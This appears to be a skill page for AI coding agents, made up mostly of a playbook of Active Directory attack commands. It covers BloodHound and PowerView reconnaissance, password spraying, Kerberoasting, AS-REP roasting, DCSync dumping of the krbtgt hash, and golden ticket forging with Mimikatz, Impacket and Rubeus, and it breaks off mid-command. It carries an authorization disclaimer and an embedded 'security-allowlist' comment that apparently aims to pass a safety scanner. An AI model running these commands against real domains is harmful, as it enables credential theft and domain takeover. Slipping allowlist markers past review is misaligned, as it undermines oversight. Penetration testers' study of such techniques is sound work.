# Active Directory Attacks

> Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and doma

- Skill: `ranbot-ai/active-directory-attacks` (Agent Skill)
- Install (CLI): `npx skillmds add ranbot-ai/active-directory-attacks`
- Raw SKILL.md: https://api.skillmd.com/api/skills/ranbot-ai/active-directory-attacks/raw
- Safety review: pending
- Works with: Claude Code, Claude.ai, OpenAI Codex
- Category: Coding & Dev Tools
- Author: ranbot-ai (https://skillmd.com/u/ranbot-ai)
- Updated: 2026-09-08
- Page: https://skillmd.com/skills/ranbot-ai/active-directory-attacks

---



> **⚠️ AUTHORIZED USE ONLY**
> This skill is for educational purposes or authorized security assessments only.
> You must have explicit, written permission from the system owner before using this tool.
> Misuse of this tool is illegal and strictly prohibited.

> **Mandatory confirmation gate**
> Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:
> 1. Ask the user to state the exact target URL, IP, account, or resource.
> 2. Ask the user to confirm written authorization and the permitted scope.
> 3. Show the exact command(s) and explain their expected effect.
> 4. Wait for explicit confirmation in the current conversation.
>
> Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.

> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.

<!-- security-allowlist: credential-extraction, kerberos-attacks -->

# Active Directory Attacks

## Purpose

Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.

## Inputs/Prerequisites

- Kali Linux or Windows attack platform
- Domain user credentials (for most attacks)
- Network access to Domain Controller
- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec

## Outputs/Deliverables

- Domain enumeration data
- Extracted credentials and hashes
- Kerberos tickets for impersonation
- Domain Administrator access
- Persistent access mechanisms

---

## Essential Tools

| Tool | Purpose |
|------|---------|
| BloodHound | AD attack path visualization |
| Impacket | Python AD attack tools |
| Mimikatz | Credential extraction |
| Rubeus | Kerberos attacks |
| CrackMapExec | Network exploitation |
| PowerView | AD enumeration |
| Responder | LLMNR/NBT-NS poisoning |

---

## Core Workflow

### Step 1: Kerberos Clock Sync

Kerberos requires clock synchronization (±5 minutes):

```bash
# Detect clock skew
nmap -sT 10.10.10.10 -p445 --script smb2-time

# Fix clock on Linux
sudo date -s "14 APR 2024 18:25:16"

# Fix clock on Windows
net time /domain /set

# Fake clock without changing system time
faketime -f '+8h' <command>
```

### Step 2: AD Reconnaissance with BloodHound

```bash
# Start BloodHound
neo4j console
bloodhound --no-sandbox

# Collect data with SharpHound
.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername user --ldappassword pass

# Python collector (from Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
```

### Step 3: PowerView Enumeration

```powershell
# Get domain info
Get-NetDomain
Get-DomainSID
Get-NetDomainController

# Enumerate users
Get-NetUser
Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset

# Enumerate groups
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member

# Find local admin access
Find-LocalAdminAccess -Verbose

# User hunting
Invoke-UserHunter
Invoke-UserHunter -Stealth
```

---

## Credential Attacks

### Password Spraying

```bash
# Using kerbrute
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123

# Using CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
```

### Kerberoasting

Extract service account TGS tickets and crack offline:

```bash
# Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# CrackMapExec
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt rockyou.txt
```

### AS-REP Roasting

Target accounts with "Do not require Kerberos preauthentication":

```bash
# Impacket
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat

# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Crack with hashcat
hashcat -m 18200 hashes.txt rockyou.txt
```

### DCSync Attack

Extract credentials directly from DC (requires Replicating Directory Changes rights):

```bash
# Impacket
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt

# Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator
```

---

## Kerberos Ticket Attacks

### Pass-the-Ticket (Golden Ticket)

Forge TGT with krbtgt hash for any user:

```powershell
# Get krbtgt hash via DCSync first
# Mimikatz - Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt

# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain 

